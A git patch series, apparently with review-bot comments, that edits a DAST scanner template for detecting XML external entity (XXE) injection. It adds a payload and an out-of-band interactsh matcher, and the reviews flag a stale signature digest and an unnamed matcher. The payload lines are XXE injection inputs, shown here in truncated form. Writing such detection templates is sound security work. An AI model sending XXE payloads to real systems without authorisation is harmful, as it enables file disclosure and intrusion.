From dd91ad9765118b7407e63af07931faa4b22c650a Mon Sep 17 00:00:00 2001
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Date: Tue, 23 Jul 2024 11:21:35 +0330
Subject: [PATCH 1/3] Improve generic-xxe.yaml
---
dast/vulnerabilities/xxe/generic-xxe.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml
index ff5cbd8d9d..54b53b1ee4 100644
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@@ -2,7 +2,7 @@ id: generic-xxe
info:
name: Generic XML external entity (XXE)
- author: pwnhxl
+ author: pwnhxl, AmirHossein Raeisi
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
@@ -23,6 +23,7 @@ http:
xxe:
- ' ]>&{{rletter}};'
- ' ]>&{{rletter}};'
+ - ' ]>&{{rletter}};'
fuzzing:
- part: query
@@ -38,7 +39,6 @@ http:
- "{{xxe}}"
stop-at-first-match: true
- matchers-condition: or
matchers:
- type: regex
name: linux
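Review bot: Dropping `matchers-condition: or` above `matchers:` makes the result depend on the engine default. That default is `or`, so behaviour should not change, but this patch also adds a third, out-of-band matcher further down, and the explicit line documents that any single matcher is enough to report a finding. I would keep `matchers-condition: or` in place. The matchers list continues outside this hunk.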
@@ -51,4 +51,9 @@ http:
part: body
words:
- 'for 16-bit app support'
-# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
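Review bot: The new `interactsh_protocol` matcher has no `name`, unlike the `linux` matcher earlier in the same list, so an out-of-band callback cannot be told apart from an in-band file-content match in the results; add a line such as `name: oob-http` under `- type: word`. The `# digest:` line is re-added with the same value although the template body changed in this patch, so the signature presumably no longer matches the content and should be regenerated by the signing process rather than carried over. The matcher can only fire if one of the `xxe` payloads embeds `{{interactsh-url}}`, which is not visible in the payload hunk as shown here and is worth confirming. The matchers block starts outside this hunk.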
From 3934b2b1bc98e475a15c4624383ab39b3bd22ba9 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 24 Jul 2024 14:08:52 +0530
Subject: [PATCH 2/3] Update generic-xxe.yaml
---
dast/vulnerabilities/xxe/generic-xxe.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml
index 54b53b1ee4..5992137d30 100644
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@@ -1,8 +1,8 @@
id: generic-xxe
info:
- name: Generic XML external entity (XXE)
- author: pwnhxl, AmirHossein Raeisi
+ name: Generic XML External Entity - (XXE)
+ author: pwnhxl,Ahsraeisi
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
From 8c57d4b85feefa50629428b6abecf8ef6aa0f53d Mon Sep 17 00:00:00 2001
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Date: Wed, 24 Jul 2024 12:12:53 +0330
Subject: [PATCH 3/3] Update generic-xxe.yaml
---
dast/vulnerabilities/xxe/generic-xxe.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml
index 5992137d30..ecd44c93e3 100644
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@@ -2,7 +2,7 @@ id: generic-xxe
info:
name: Generic XML External Entity - (XXE)
- author: pwnhxl,Ahsraeisi
+ author: pwnhxl,AmirHossein Raeisi
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py